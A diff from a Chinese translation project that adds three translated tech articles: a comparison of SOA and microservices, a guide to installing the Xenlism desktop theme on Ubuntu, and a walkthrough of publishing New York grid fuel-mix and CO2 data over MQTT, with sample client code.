--------------------------------------------------------------------------------
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
via: https://www.melvinvivas.com/developing-microservices-using-kafka-and-mongodb/
|
via: https://www.melvinvivas.com/developing-microservices-using-kafka-and-mongodb/
|
||||||
|
|
||||||
作者:[Melvin Vivas ][a]
|
作者:[Melvin Vivas ][a]
|
||||||
译者:[译者ID](https://github.com/译者ID)
|
译者:[qhwdw](https://github.com/qhwdw)
|
||||||
校对:[校对者ID](https://github.com/校对者ID)
|
校对:[校对者ID](https://github.com/校对者ID)
|
||||||
|
|
||||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
@ -0,0 +1,57 @@
|
|||||||
|
老树发新芽:微服务 – DXC Blogs
|
||||||
|
======
|
||||||
|
![](https://csccommunity.files.wordpress.com/2018/05/old-building-with-modern-addition.jpg?w=610)
|
||||||
|
|
||||||
|
如果我告诉你有这样一种软件架构,一个应用程序的组件通过基于网络的通讯协议为其它组件提供服务,我估计你可能会说它是 …
|
||||||
|
|
||||||
|
是的,确实是。如果你从上世纪九十年代就开始了你的编程生涯,那么你肯定会说它是 [面向服务的架构 (SOA)][1]。但是,如果你是个年青人,并且在云上获得初步的经验,那么,你将会说:“哦,你说的是 [微服务][2]。”
|
||||||
|
|
||||||
|
你们都没错。如果想真正地了解它们的差别,你需要深入地研究这两种架构。
|
||||||
|
|
||||||
|
在 SOA 中,一个服务是一个功能,它是定义好的、自包含的、并且是不依赖上下文和其它服务的状态的功能。总共有两种服务。一种是消费者服务,它从另外类型的服务 —— 提供者服务 —— 中请求一个服务。一个 SOA 服务可以同时扮演这两种角色。
|
||||||
|
|
||||||
|
SOA 服务可以与其它服务交换数据。两个或多个服务也可以彼此之间相互协调。这些服务执行基本的任务,比如创建一个用户帐户、提供登陆功能、或验证支付。
|
||||||
|
|
||||||
|
与其说 SOA 是模块化一个应用程序,还不如说它是把分布式的、独立维护和部署的组件,组合成一个应用程序。然后在服务器上运行这些组件。
|
||||||
|
|
||||||
|
早期版本的 SOA 使用面向对象的协议进行组件间通讯。例如,微软的 [分布式组件对象模型 (DCOM)][3] 和使用 [通用对象请求代理架构 (CORBA)][5] 规范的 [对象请求代理 (ORBs)][4]。
|
||||||
|
|
||||||
|
较新的 SOA 版本则使用消息服务,比如 [Java 消息服务 (JMS)][6] 或者 [高级消息队列协议 (AMQP)][7]。这些服务通过企业服务总线 (ESB) 进行连接,并基于这些总线传递和接收可扩展标记语言(XML)格式的数据。
|
||||||
|
|
||||||
|
[微服务][2] 是一种架构风格,其中的应用程序由松散耦合的服务或模块组成。它适用于开发大型的、复杂的应用程序的持续集成/持续部署(CI/CD)模型。一个应用程序就是一堆模块的汇总。
|
||||||
|
|
||||||
|
每个微服务提供一个应用程序编程接口(API)端点。它们通过轻量级协议连接,比如,[表述性状态转移 (REST)][8],或 [gRPC][9]。数据倾向于使用 [JavaScript 对象标记 (JSON)][10] 或 [Protobuf][11] 来表示。
|
||||||
|
|
||||||
|
这两种架构都可以用于去替代以前老的整体式架构,整体式架构的应用程序被构建为单个自治的单元。例如,在一个客户机 - 服务器模式中,一个典型的 Linux、Apache、MySQL、PHP/Python/Perl (LAMP) 服务器端应用程序将去处理 HTTP 请求、运行子程序、以及从底层的 MySQL 数据库中检索/更新数据。所有这些应用程序“绑”在一起提供服务。当你改变了任何一个东西,你都必须去构建和部署一个新版本。
|
||||||
|
|
||||||
|
使用 SOA,你可以只改变需要的几个组件,而不是整个应用程序。使用微服务,你可以做到一次只改变一个服务。使用微服务,你才能真正做到一个解耦架构。
|
||||||
|
|
||||||
|
微服务也比 SOA 更轻量级。不过 SOA 服务是部署到服务器和虚拟机上,而微服务是部署在容器中。协议也更轻量级。这使得微服务比 SOA 更灵活。因此,它更适合于要求敏捷性的电商网站。
|
||||||
|
|
||||||
|
说了这么多,到底意味着什么呢?微服务就是 SOA 在容器和云计算上的变种。
|
||||||
|
|
||||||
|
老式的 SOA 并没有离我们远去,但是,因为我们持续将应用程序搬迁到容器中,所以微服务架构将越来越流行。
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://blogs.dxc.technology/2018/05/08/everything-old-is-new-again-microservices/
|
||||||
|
|
||||||
|
作者:[Cloudy Weather][a]
|
||||||
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
|
译者:[qhwdw](https://github.com/qhwdw)
|
||||||
|
校对:[校对者ID](https://github.com/校对者ID)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://blogs.dxc.technology/author/steven-vaughan-nichols/
|
||||||
|
[1]:https://www.service-architecture.com/articles/web-services/service-oriented_architecture_soa_definition.html
|
||||||
|
[2]:http://microservices.io/
|
||||||
|
[3]:https://technet.microsoft.com/en-us/library/cc958799.aspx
|
||||||
|
[4]:https://searchmicroservices.techtarget.com/definition/Object-Request-Broker-ORB
|
||||||
|
[5]:http://www.corba.org/
|
||||||
|
[6]:https://docs.oracle.com/javaee/6/tutorial/doc/bncdq.html
|
||||||
|
[7]:https://www.amqp.org/
|
||||||
|
[8]:https://www.service-architecture.com/articles/web-services/representational_state_transfer_rest.html
|
||||||
|
[9]:https://grpc.io/
|
||||||
|
[10]:https://www.json.org/
|
||||||
|
[11]:https://github.com/google/protobuf/
|
@ -0,0 +1,92 @@
|
|||||||
|
使用 Xenlism 主题为你的 Linux 桌面带来令人惊叹的改造
|
||||||
|
============================================================
|
||||||
|
|
||||||
|
|
||||||
|
_简介:Xenlism 主题包提供了一个美观的 GTK 主题、彩色的图标和简约的壁纸,可以将你的 Linux 桌面改造得引人注目。_
|
||||||
|
|
||||||
|
除非我找到一些非常棒的东西,否则我不会每天都把整篇文章献给一个主题。我曾经经常发布主题和图标。但最近,我更喜欢列出[最佳 GTK 主题][6]和图标主题。这对我和你来说都更方便,你可以在一个地方看到许多美丽的主题。
|
||||||
|
|
||||||
|
在 [Pop OS 主题][7]套件之后,Xenlism 是另一个让我对它的外观感到震惊的主题。
|
||||||
|
|
||||||
|
![Xenlism GTK theme for Ubuntu and Other Linux](https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2018/05/xenlishm-minimalism-gtk-theme-800x450.jpeg)
|
||||||
|
|
||||||
|
Xenlism GTK 主题基于 Arc 主题,Arc 是许多主题背后的灵感来源。该 GTK 主题提供类似于 macOS 的窗口按钮,对此我说不上喜欢,也说不上不喜欢。GTK 主题采用扁平、简约的布局,我喜欢这样。
|
||||||
|
|
||||||
|
Xenlism 套件中有两个图标主题。Xenlism Wildfire 是较早的一个,已经进入我们的[最佳图标主题][8]列表。
|
||||||
|
|
||||||
|
![Beautiful Xenlism Wildfire theme for Ubuntu and Other Linux](https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2018/05/xenlism-wildfire-theme-800x450.jpeg)
|
||||||
|
Xenlism Wildfire 图标
|
||||||
|
|
||||||
|
Xenlism Storm 是一个相对较新的图标主题,但同样美观。
|
||||||
|
|
||||||
|
![Beautiful Xenlism Storm theme for Ubuntu and Other Linux](https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2018/05/xenlism-storm-theme-1-800x450.jpeg)
|
||||||
|
Xenlism Storm 图标
|
||||||
|
|
||||||
|
Xenlism 主题是在 GPL 许可下开源的。
|
||||||
|
|
||||||
|
### 如何在 Ubuntu 18.04 上安装 Xenlism 主题包
|
||||||
|
|
||||||
|
Xenlism 的开发者提供了一种通过 PPA 安装主题包的更简单方法。尽管该 PPA 也可用于 Ubuntu 16.04,但我发现 GTK 主题不适用于 Unity。它适用于 Ubuntu 18.04 中的 GNOME 桌面。
|
||||||
|
|
||||||
|
打开终端(Ctrl+Alt+T)并逐个使用以下命令:
|
||||||
|
|
||||||
|
```
|
||||||
|
sudo add-apt-repository ppa:xenatt/xenlism
|
||||||
|
sudo apt update
|
||||||
|
```
|
||||||
|
|
||||||
|
该 PPA 提供四个包:
|
||||||
|
|
||||||
|
* xenlism-finewalls:一组壁纸,可直接在 Ubuntu 的壁纸中使用。截图中使用了其中一个壁纸。
|
||||||
|
|
||||||
|
* xenlism-minimalism-theme:GTK 主题
|
||||||
|
|
||||||
|
* xenlism-storm:一个图标主题(见前面的截图)
|
||||||
|
|
||||||
|
* xenlism-wildfire-icon-theme:具有多种颜色变化的另一个图标主题(文件夹颜色在变体中更改)
|
||||||
|
|
||||||
|
你可以自己决定要安装的主题组件。就个人而言,我认为安装所有组件没有任何损害。
|
||||||
|
|
||||||
|
```
|
||||||
|
sudo apt install xenlism-minimalism-theme xenlism-storm-icon-theme xenlism-wildfire-icon-theme xenlism-finewalls
|
||||||
|
```
|
||||||
|
|
||||||
|
你可以使用 GNOME Tweaks 来更改主题和图标。如果你不熟悉该过程,我建议你阅读本教程以学习[如何在 Ubuntu 18.04 GNOME 中安装主题][9]。
|
||||||
|
|
||||||
|
### 在其他 Linux 发行版中获取 Xenlism 主题
|
||||||
|
|
||||||
|
你也可以在其他 Linux 发行版上安装 Xenlism 主题。各种 Linux 发行版的安装说明可在其网站上找到:
|
||||||
|
|
||||||
|
[安装 Xenlism 主题][10]
|
||||||
|
|
||||||
|
### 你怎么看?
|
||||||
|
|
||||||
|
我知道不是每个人都会同意我,但我喜欢这个主题。我想你将来会在 It's FOSS 的教程截图中看到 Xenlism 主题。
|
||||||
|
|
||||||
|
你喜欢 Xenlism 主题吗?如果不喜欢,你最喜欢什么主题?在下面的评论部分分享你的意见。
|
||||||
|
|
||||||
|
#### 关于作者
|
||||||
|
|
||||||
|
我是一名专业软件开发人员,也是 It's FOSS 的创始人。我是一名狂热的 Linux 爱好者和开源爱好者。我使用 Ubuntu 并相信分享知识。除了Linux,我喜欢经典侦探之谜。我是 Agatha Christie 作品的忠实粉丝。
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://itsfoss.com/xenlism-theme/
|
||||||
|
|
||||||
|
作者:[Abhishek Prakash ][a]
|
||||||
|
译者:[geekpi](https://github.com/geekpi)
|
||||||
|
校对:[校对者ID](https://github.com/校对者ID)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://itsfoss.com/author/abhishek/
|
||||||
|
[1]:https://itsfoss.com/author/abhishek/
|
||||||
|
[2]:https://itsfoss.com/xenlism-theme/#comments
|
||||||
|
[3]:https://itsfoss.com/category/desktop/
|
||||||
|
[4]:https://itsfoss.com/tag/themes/
|
||||||
|
[5]:https://itsfoss.com/tag/xenlism/
|
||||||
|
[6]:https://itsfoss.com/best-gtk-themes/
|
||||||
|
[7]:https://itsfoss.com/pop-icon-gtk-theme-ubuntu/
|
||||||
|
[8]:https://itsfoss.com/best-icon-themes-ubuntu-16-04/
|
||||||
|
[9]:https://itsfoss.com/install-themes-ubuntu/
|
||||||
|
[10]:http://xenlism.github.io/minimalism/#install
|
@ -0,0 +1,256 @@
|
|||||||
|
使用 MQTT 实现项目数据收发
|
||||||
|
======
|
||||||
|
|
||||||
|
![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/toolbox-learn-draw-container-yearbook.png?itok=xDbwz1pP)
|
||||||
|
|
||||||
|
去年 11 月我们购买了一辆电动汽车,同时也引发了有趣的思考:我们应该什么时候为电动汽车充电?对于电动汽车充电所用的电,我希望能够对应最小的二氧化碳排放,归结为一个特定的问题:对于任意给定时刻,每千瓦时对应的二氧化碳排放量是多少,一天中什么时间这个值最低?
|
||||||
|
|
||||||
|
|
||||||
|
### 寻找数据
|
||||||
|
|
||||||
|
我住在纽约州,大约 80% 的电力消耗可以自给自足,主要来自天然气、水坝(大部分来自于<ruby>尼亚加拉<rt>Niagara</rt></ruby>大瀑布)、核能发电,少部分来自风力、太阳能和其它化石燃料发电。非盈利性组织 [<ruby>纽约独立电网运营商<rt>New York Independent System Operator</rt></ruby>][1] (NYISO) 负责整个系统的运作,实现发电机组发电与用电之间的平衡,同时也是纽约路灯系统的监管部门。
|
||||||
|
|
||||||
|
尽管没有为公众提供公开 API,NYISO 还是尽责提供了[不少公开数据][2]供公众使用。每隔 5 分钟汇报全州各个发电机组消耗的燃料数据。数据以 CSV 文件的形式发布于公开的档案库中,全天更新。如果你了解不同燃料对发电瓦数的贡献比例,你可以比较准确的估计任意时刻的二氧化碳排放情况。
|
||||||
|
|
||||||
|
在构建收集处理公开数据的工具时,我们应该时刻避免过度使用这些资源。相比将这些数据打包并发送给所有人,我们有更好的方案。我们可以创建一个低开销的<ruby>事件流<rt>event stream</rt></ruby>,人们可以订阅并第一时间得到消息。我们可以使用 [MQTT][3] 实现该方案。我的 ([ny-power.org][4]) 项目目标是收录到 [Home Assistant][5] 项目中;后者是一个开源的<ruby>家庭自动化<rt>home automation</rt></ruby>平台,拥有数十万用户。如果所有用户同时访问 CSV 文件服务器,估计 NYISO 不得不增加访问限制。
|
||||||
|
|
||||||
|
### MQTT 是什么?
|
||||||
|
|
||||||
|
MQTT 是一个<ruby>发布订阅线协议<rt>publish/subscription wire protocol</rt></ruby>,为小规模设备设计。发布订阅系统工作原理类似于消息总线。你将一条消息发布到一个<ruby>主题<rt>topic</rt></ruby>上,那么所有订阅了该主题的客户端都可以获得该消息的一份拷贝。对于消息发送者而言,无需知道哪些人在订阅消息;你只需将消息发布到一系列主题,同时订阅一些你感兴趣的主题。就像参加了一场聚会,你选取并加入感兴趣的对话。
|
||||||
|
|
||||||
|
MQTT 可用于构建极为高效的应用。客户端订阅有限的几个主题,也只接收它们感兴趣的内容。这不仅节省了处理时间,还降低了网络带宽的使用。
|
||||||
|
|
||||||
|
作为一个开放标准,MQTT 有很多开源的客户端和服务端实现。对于你能想到的每种编程语言,都有对应的客户端库;甚至有嵌入到 Arduino 的库,可以构建传感器网络。服务端可供选择的也很多,我的选择是 Eclipse 项目提供的 [Mosquitto][6] 服务端,这是因为它体积小、用 C 编写,可以承载数以万计的订阅者。
|
||||||
|
|
||||||
|
### 为何我喜爱 MQTT
|
||||||
|
|
||||||
|
在过去二十年间,我们为软件应用设计了可靠且准确的模型,用于解决服务遇到的问题。我还有其它邮件吗?当前的天气情况如何?我应该此刻购买这种产品吗?在绝大多数情况下,这种<ruby>问答式<rt>ask/receive</rt></ruby>的模型工作良好;但对于一个数据爆炸的世界,我们需要其它的模型。MQTT 的发布订阅模型十分强大,可以将大量数据发送到系统中。客户可以订阅数据中的一小部分并在订阅数据发布的第一时间收到更新。
|
||||||
|
|
||||||
|
MQTT 还有一些有趣的特性,其中之一是<ruby>遗嘱<rt>last-will-and-testament</rt></ruby>消息,可以用于区分两种不同的静默,一种是没有主题相关数据推送,另一种是你的数据接收器出现故障。MQTT 还包括<ruby>保留消息<rt>retained message</rt></ruby>,当客户端初次连接时会提供相关主题的最后一条消息。这对那些更新缓慢的主题来说很有必要。
|
||||||
|
|
||||||
|
我在 Home Assistant 项目开发过程中,发现这种消息总线模型对<ruby>异构系统<rt>heterogeneous systems</rt></ruby>尤为适合。如果你深入<ruby>物联网<rt>Internet of Things</rt></ruby>领域,你会发现 MQTT 无处不在。
|
||||||
|
|
||||||
|
### 我们的第一个 MQTT 流
|
||||||
|
|
||||||
|
NYISO 公布的 CSV 文件中有一个是实时的燃料混合使用情况。每隔 5 分钟,NYISO 会发布这 5 分钟内发电使用的燃料类型和相应的发电量(以兆瓦为单位)。
|
||||||
|
|
||||||
|
The CSV file looks something like this:
|
||||||
|
|
||||||
|
| 时间戳 | 时区 | 燃料类型 | 兆瓦为单位的发电量 |
|
||||||
|
| --- | --- | --- | --- |
|
||||||
|
| 05/09/2018 00:05:00 | EDT | 混合燃料 | 1400 |
|
||||||
|
| 05/09/2018 00:05:00 | EDT | 天然气 | 2144 |
|
||||||
|
| 05/09/2018 00:05:00 | EDT | 核能 | 4114 |
|
||||||
|
| 05/09/2018 00:05:00 | EDT | 其它化石燃料 | 4 |
|
||||||
|
| 05/09/2018 00:05:00 | EDT | 其它可再生资源 | 226 |
|
||||||
|
| 05/09/2018 00:05:00 | EDT | 风力 | 1 |
|
||||||
|
| 05/09/2018 00:05:00 | EDT | 水力 | 3229 |
|
||||||
|
| 05/09/2018 00:10:00 | EDT | 混合燃料 | 1307 |
|
||||||
|
| 05/09/2018 00:10:00 | EDT | 天然气 | 2092 |
|
||||||
|
| 05/09/2018 00:10:00 | EDT | 核能 | 4115 |
|
||||||
|
| 05/09/2018 00:10:00 | EDT | 其它化石燃料 | 4 |
|
||||||
|
| 05/09/2018 00:10:00 | EDT | 其它可再生资源 | 224 |
|
||||||
|
| 05/09/2018 00:10:00 | EDT | 风力 | 40 |
|
||||||
|
| 05/09/2018 00:10:00 | EDT | 水力 | 3166 |
|
||||||
|
|
||||||
|
表中唯一令人不解的就是燃料类别中的混合燃料。纽约的大多数天然气工厂也通过燃烧其它类型的化石燃料发电。在冬季寒潮到来之际,家庭供暖的优先级高于发电;但这种情况出现的次数不多,(在我们的计算中)可以将混合燃料类型看作天然气类型。
|
||||||
|
|
||||||
|
CSV 文件全天更新。我编写了一个简单的数据泵,每隔 1 分钟检查是否有数据更新,并将新条目发布到 MQTT 服务器的一系列主题上,主题名称基本与 CSV 文件有一定的对应关系。数据内容被转换为 JSON 对象,方便各种编程语言处理。
|
||||||
|
|
||||||
|
```
|
||||||
|
ny-power/upstream/fuel-mix/Hydro {"units": "MW", "value": 3229, "ts": "05/09/2018 00:05:00"}
|
||||||
|
ny-power/upstream/fuel-mix/Dual Fuel {"units": "MW", "value": 1400, "ts": "05/09/2018 00:05:00"}
|
||||||
|
ny-power/upstream/fuel-mix/Natural Gas {"units": "MW", "value": 2144, "ts": "05/09/2018 00:05:00"}
|
||||||
|
ny-power/upstream/fuel-mix/Other Fossil Fuels {"units": "MW", "value": 4, "ts": "05/09/2018 00:05:00"}
|
||||||
|
ny-power/upstream/fuel-mix/Wind {"units": "MW", "value": 41, "ts": "05/09/2018 00:05:00"}
|
||||||
|
ny-power/upstream/fuel-mix/Other Renewables {"units": "MW", "value": 226, "ts": "05/09/2018 00:05:00"}
|
||||||
|
ny-power/upstream/fuel-mix/Nuclear {"units": "MW", "value": 4114, "ts": "05/09/2018 00:05:00"}
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
这种直接的转换是种不错的尝试,可将公开数据转换为公开事件。我们后续会继续将数据转换为二氧化碳排放强度,但这些原始数据还可被其它应用使用,用于其它计算用途。
|
||||||
|
|
||||||
|
### MQTT 主题
|
||||||
|
|
||||||
|
主题和<ruby>主题结构<rt>topic structure</rt></ruby>是 MQTT 的一个主要特色。与其它标准的企业级消息总线不同,MQTT 的主题无需事先注册。发送者可以凭空创建主题,唯一的限制是主题的长度,不超过 220 字符。其中 `/` 字符有特殊含义,用于创建主题的层次结构。我们即将看到,你可以订阅这些层次中的一些分片。
|
||||||
|
|
||||||
|
基于开箱即用的 Mosquitto,任何一个客户端都可以向任何主题发布消息。在原型设计过程中,这种方式十分便利;但一旦部署到生产环境,你需要增加<ruby>访问控制列表<rt>access control list, ACL</rt></ruby>只允许授权的应用发布消息。例如,任何人都能以只读的方式访问我的应用的主题层级,但只有那些具有特定<ruby>凭证<rt>credentials</rt></ruby>的客户端可以发布内容。
|
||||||
|
|
||||||
|
主题中不包含<ruby>自动样式<rt>automatic schema</rt></ruby>,也没有方法查找客户端可以发布的全部主题。因此,对于那些从 MQTT 总线消费数据的应用,你需要让其直接使用已知的主题和消息格式样式。
|
||||||
|
|
||||||
|
那么应该如何设计主题呢?最佳实践包括使用应用相关的根名称,例如在我的应用中使用 `ny-power`。接着,为提高订阅效率,构建足够深的层次结构。`upstream` 层次结构包含了直接从数据源获取的、不经处理的原始数据,而 `fuel-mix` 层次结构包含特定类型的数据;我们后续还可以增加其它的层次结构。
|
||||||
|
|
||||||
|
### 订阅主题
|
||||||
|
|
||||||
|
在 MQTT 中,订阅仅仅是简单的字符串匹配。为提高处理效率,只允许如下两种通配符:
|
||||||
|
|
||||||
|
* `#` 以递归方式匹配,直到字符串结束
|
||||||
|
* `+` 匹配下一个 `/` 之前的内容
|
||||||
|
|
||||||
|
|
||||||
|
为便于理解,下面给出几个例子:
|
||||||
|
```
|
||||||
|
ny-power/# - 匹配 ny-power 应用发布的全部主题
|
||||||
|
ny-power/upstream/# - 匹配全部原始数据的主题
|
||||||
|
ny-power/upstream/fuel-mix/+ - 匹配全部燃料类型的主题
|
||||||
|
ny-power/+/+/Hydro - 匹配两个层级之后为 Hydro 类型的全部主题(即使不位于 upstream 层次结构下)
|
||||||
|
```
|
||||||
|
|
||||||
|
类似 `ny-power/#` 的大范围订阅适用于<ruby>低数据量<rt>low-volume</rt></ruby>的应用,应用从网络获取全部数据并处理。但对<ruby>高数据量<rt>high-volume</rt></ruby>应用而言则是一个灾难,由于绝大多数消息并不会被使用,大部分的网络带宽被白白浪费了。
|
||||||
|
|
||||||
|
在大数据量情况下,为确保性能,应用需要使用恰当的主题筛选(如 `ny-power/+/+/Hydro`)尽量准确获取业务所需的数据。
|
||||||
|
|
||||||
|
### 增加我们自己的数据层次
|
||||||
|
|
||||||
|
接下来,应用中的一切都依赖于已有的 MQTT 流并构建新流。第一个额外的数据层用于计算发电对应的二氧化碳排放。
|
||||||
|
|
||||||
|
利用[<ruby>美国能源情报署<rt>U.S. Energy Information Administration</rt></ruby>][7] 给出的 2016 年纽约各类燃料发电及排放情况,我们可以给出各类燃料的[平均排放率][8],单位为克/兆瓦时。
|
||||||
|
|
||||||
|
上述结果被封装到一个专用的微服务中。该微服务订阅 `ny-power/upstream/fuel-mix/+`,即数据泵中燃料组成情况的原始数据,接着完成计算并将结果(单位为克/千瓦时)发布到新的主题层次结构上:
|
||||||
|
```
|
||||||
|
ny-power/computed/co2 {"units": "g / kWh", "value": 152.9486, "ts": "05/09/2018 00:05:00"}
|
||||||
|
```
|
||||||
|
|
||||||
|
接着,另一个服务会订阅该主题层次结构并将数据打包到 [InfluxDB][9] 进程中;同时,发布 24 小时内的时间序列数据到 `ny-power/archive/co2/24h` 主题,这样可以大大简化当前变化数据的绘制。
|
||||||
|
|
||||||
|
这种层次结构的主题模型效果不错,可以将上述程序之间的逻辑解耦合。在复杂系统中,各个组件可能使用不同的编程语言,但这并不重要,因为交换格式都是 MQTT 消息,即主题和 JSON 格式的消息内容。
|
||||||
|
|
||||||
|
### 从终端消费数据
|
||||||
|
|
||||||
|
为了更好的了解 MQTT 完成了什么工作,将其绑定到一个消息总线并查看消息流是个不错的方法。`mosquitto-clients` 包中的 `mosquitto_sub` 可以让我们轻松实现该目标。
|
||||||
|
|
||||||
|
安装程序后,你需要提供服务器名称以及你要订阅的主题。如果有需要,使用参数 `-v` 可以让你看到有新消息发布的那些主题;否则,你只能看到主题内的消息数据。
|
||||||
|
|
||||||
|
```
|
||||||
|
mosquitto_sub -h mqtt.ny-power.org -t ny-power/# -v
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
只要我编写或调试 MQTT 应用,我总会在一个终端中运行 `mosquitto_sub`。
|
||||||
|
|
||||||
|
### 从网页直接访问 MQTT
|
||||||
|
|
||||||
|
到目前为止,我们已经有提供公开事件流的应用,可以用微服务或命令行工具访问该应用。但考虑到互联网仍占据主导地位,因此让用户可以从浏览器直接获取事件流是很重要。
|
||||||
|
|
||||||
|
MQTT 的设计者已经考虑到了这一点。协议标准支持三种不同的传输协议:[TCP][10],[UDP][11] 和 [WebSockets][12]。主流浏览器都支持 WebSockets,可以维持持久连接,用于实时应用。
|
||||||
|
|
||||||
|
Eclipse 项目提供了 MQTT 的一个 JavaScript 实现,叫做 [Paho][13],可包含在你的应用中。工作模式为与服务器建立连接、建立一些订阅,然后根据接收到的消息进行响应。
|
||||||
|
|
||||||
|
```
|
||||||
|
// ny-power web console application
|
||||||
|
|
||||||
|
var client = new Paho.MQTT.Client(mqttHost, Number("80"), "client-" + Math.random());
|
||||||
|
|
||||||
|
// set callback handlers
|
||||||
|
client.onMessageArrived = onMessageArrived;
|
||||||
|
|
||||||
|
// connect the client
|
||||||
|
client.reconnect = true;
|
||||||
|
client.connect({onSuccess: onConnect});
|
||||||
|
|
||||||
|
// called when the client connects
|
||||||
|
function onConnect() {
|
||||||
|
// Once a connection has been made, make a subscription and send a message.
|
||||||
|
console.log("onConnect");
|
||||||
|
client.subscribe("ny-power/computed/co2");
|
||||||
|
client.subscribe("ny-power/archive/co2/24h");
|
||||||
|
client.subscribe("ny-power/upstream/fuel-mix/#");
|
||||||
|
}
|
||||||
|
|
||||||
|
// called when a message arrives
|
||||||
|
function onMessageArrived(message) {
|
||||||
|
console.log("onMessageArrived:"+message.destinationName + message.payloadString);
|
||||||
|
if (message.destinationName == "ny-power/computed/co2") {
|
||||||
|
var data = JSON.parse(message.payloadString);
|
||||||
|
$("#co2-per-kwh").html(Math.round(data.value));
|
||||||
|
$("#co2-units").html(data.units);
|
||||||
|
$("#co2-updated").html(data.ts);
|
||||||
|
}
|
||||||
|
|
||||||
|
if (message.destinationName.startsWith("ny-power/upstream/fuel-mix")) {
|
||||||
|
fuel_mix_graph(message);
|
||||||
|
}
|
||||||
|
|
||||||
|
if (message.destinationName == "ny-power/archive/co2/24h") {
|
||||||
|
var data = JSON.parse(message.payloadString);
|
||||||
|
var plot = [
|
||||||
|
{
|
||||||
|
x: data.ts,
|
||||||
|
y: data.values,
|
||||||
|
type: 'scatter'
|
||||||
|
}
|
||||||
|
];
|
||||||
|
var layout = {
|
||||||
|
yaxis: {
|
||||||
|
title: "g CO2 / kWh",
|
||||||
|
}
|
||||||
|
};
|
||||||
|
Plotly.newPlot('co2_graph', plot, layout);
|
||||||
|
}
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
上述应用订阅了不少主题,因为我们将要呈现若干种不同类型的数据;其中 `ny-power/computed/co2` 主题为我们提供当前二氧化碳排放的参考值。一旦收到该主题的新消息,网站上的相应内容会被相应替换。
|
||||||
|
|
||||||
|
|
||||||
|
![NYISO 二氧化碳排放图][15]
|
||||||
|
|
||||||
|
[ny-power.org][4] 网站提供的 NYISO 二氧化碳排放图。
|
||||||
|
|
||||||
|
`ny-power/archive/co2/24h` 主题提供了时间序列数据,用于为 [Plotly][16] 线表提供数据。`ny-power/upstream/fuel-mix` 主题提供当前燃料组成情况,为漂亮的柱状图提供数据。
|
||||||
|
|
||||||
|
![NYISO 燃料组成情况][18]
|
||||||
|
|
||||||
|
[ny-power.org][4] 网站提供的燃料组成情况。
|
||||||
|
|
||||||
|
这是一个动态网站,数据不从服务器拉取,而是结合 MQTT 消息总线,监听对外开放的 WebSocket。就像数据泵和打包器程序那样,网站页面也是一个发布订阅客户端,只不过是在你的浏览器中执行,而不是在公有云的微服务上。
|
||||||
|
|
||||||
|
你可以在 <http://ny-power.org> 站点上看到动态变更,包括图像和可以看到消息到达的实时 MQTT 终端。
|
||||||
|
|
||||||
|
### 继续深入
|
||||||
|
|
||||||
|
ny-power.org 应用的完整内容开源在 [GitHub][19] 中。你也可以查阅 [架构简介][20],学习如何使用 [Helm][21] 部署一系列 Kubernetes 微服务构建应用。另一个有趣的 MQTT 示例使用 MQTT 和 OpenWhisk 进行实时文本消息翻译,<ruby>代码模式<rt>code pattern</rt></ruby>参考[链接][22]。
|
||||||
|
|
||||||
|
MQTT 被广泛应用于物联网领域,更多关于 MQTT 用途的例子可以在 [Home Assistant][23] 项目中找到。
|
||||||
|
|
||||||
|
如果你希望深入了解协议内容,可以从 [mqtt.org][3] 获得该公开标准的全部细节。
|
||||||
|
|
||||||
|
想了解更多,可以参加 Sean Dague 在 [OSCON][25] 上的演讲,主题为[将 MQTT 加入到你的工具箱][24],会议将于 7 月 16-19 日在俄勒冈州波特兰举办。
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://opensource.com/article/18/6/mqtt
|
||||||
|
|
||||||
|
作者:[Sean Dague][a]
|
||||||
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
|
译者:[译者ID](https://github.com/译者ID)
|
||||||
|
校对:[校对者ID](https://github.com/校对者ID)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://opensource.com/users/sdague
|
||||||
|
[1]:http://www.nyiso.com/public/index.jsp
|
||||||
|
[2]:http://www.nyiso.com/public/markets_operations/market_data/reports_info/index.jsp
|
||||||
|
[3]:http://mqtt.org/
|
||||||
|
[4]:http://ny-power.org/#
|
||||||
|
[5]:https://www.home-assistant.io
|
||||||
|
[6]:https://mosquitto.org/
|
||||||
|
[7]:https://www.eia.gov/
|
||||||
|
[8]:https://github.com/IBM/ny-power/blob/master/src/nypower/calc.py#L1-L60
|
||||||
|
[9]:https://www.influxdata.com/
|
||||||
|
[10]:https://en.wikipedia.org/wiki/Transmission_Control_Protocol
|
||||||
|
[11]:https://en.wikipedia.org/wiki/User_Datagram_Protocol
|
||||||
|
[12]:https://en.wikipedia.org/wiki/WebSocket
|
||||||
|
[13]:https://www.eclipse.org/paho/
|
||||||
|
[14]:/file/400041
|
||||||
|
[15]:https://opensource.com/sites/default/files/uploads/mqtt_nyiso-co2intensity.png (NY ISO Grid CO2 Intensity)
|
||||||
|
[16]:https://plot.ly/
|
||||||
|
[17]:/file/400046
|
||||||
|
